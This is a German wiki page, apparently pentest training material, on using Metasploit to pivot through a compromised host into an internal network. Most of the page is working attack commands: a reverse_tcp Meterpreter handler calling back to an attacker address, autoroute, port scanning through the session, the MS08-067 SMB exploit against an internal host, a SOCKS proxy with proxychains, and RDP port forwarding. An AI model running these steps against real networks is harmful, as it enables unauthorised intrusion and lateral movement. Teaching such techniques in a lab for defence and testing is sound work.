Metasploit als Pivot Host: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
(Die Seite wurde neu angelegt: „== Ziel == * Zugriff auf interne Systeme im Netz 10.0.10.0/24, die vom Angreifer aus nicht direkt erreichbar sind * Nutzung eines kompromittierten Hosts als Sp…“) |
(kein Unterschied)
|
Version vom 22. Mai 2025, 09:34 Uhr
Ziel
- Zugriff auf interne Systeme im Netz 10.0.10.0/24, die vom Angreifer aus nicht direkt erreichbar sind
- Nutzung eines kompromittierten Hosts als Sprungbrett („Jump Host“)
- Portweiterleitung, Routing und Exploits über Metasploit
Voraussetzungen
- Erfolgreicher Exploit mit Meterpreter-Session auf einem System innerhalb von 10.0.10.0/24
- Metasploit ist aktiv mit laufender Session
Meterpreter-Session starten
- Exploit nutzen oder manuell Listener starten:
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.56.1 set LPORT 4444 run
- Wenn sich das Ziel meldet:
sessions
Beispielausgabe:
[*] Meterpreter session 1 opened
Interne Netzwerke sichtbar machen
- In der Session:
sessions -i 1 ipconfig route arp
- Notiere interne Subnetze, z. B. 10.0.10.0/24
Autoroute einrichten für 10.0.10.0/24
- In der aktiven Meterpreter-Session:
run autoroute -s 10.0.10.0 -n 255.255.255.0
- Anzeige aller Routen:
run autoroute -p
Scannen von Zielen über die Session
- Zurück in msfconsole:
use auxiliary/scanner/portscan/tcp set RHOSTS 10.0.10.10 set PORTS 22,80,445 run
- Der Scan wird über die autoroute durch die Meterpreter-Session geleitet.
Exploits durch die Pivot-Route durchführen
- Beispiel:
use exploit/windows/smb/ms08_067_netapi set RHOST 10.0.10.10 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.56.1 set LPORT 4445 exploit
Optional: SOCKS-Proxy starten für externe Tools
- SOCKS-Proxy aktivieren:
use auxiliary/server/socks_proxy run
- In /etc/proxychains.conf folgendes ergänzen:
socks5 127.0.0.1 1080
- Beispiel mit nmap durch die Pivot-Verbindung:
proxychains nmap -sT -Pn 10.0.10.20
Portweiterleitung (portfwd) nutzen
- In Meterpreter:
portfwd add -l 4444 -p 3389 -r 10.0.10.10
- Danach kannst du dich lokal auf RDP 127.0.0.1:4444 verbinden → wird an 10.0.10.10:3389 weitergeleitet
Hinweise
- `autoroute` funktioniert nur mit Meterpreter-Sessions
- Für effektives Pivoting sollte der Zielhost nicht durch Firewall blockiert sein
- Der `socks_proxy`-Modus ist nützlich für Tools wie `smbclient`, `nmap`, `proxychains`, `firefox`, etc.
- Mehrere Pivot-Sessions sind möglich, aber unübersichtlich – beschränke dich im Training auf eine